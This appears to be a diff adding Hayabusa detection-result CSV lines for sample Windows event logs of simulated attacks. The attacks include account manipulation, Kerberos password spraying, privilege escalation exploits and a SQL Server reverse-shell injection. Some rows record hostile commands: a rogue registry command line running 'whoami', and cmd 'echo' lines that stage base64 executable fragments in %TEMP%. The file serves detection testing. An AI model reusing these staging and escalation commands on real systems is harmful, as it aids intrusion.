+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
+2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,../hayabusa-rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
+2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx
+2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-08-02 07:58:09.443 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQALVO2SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAADmNAAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x414 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:09.721 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:09.995 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
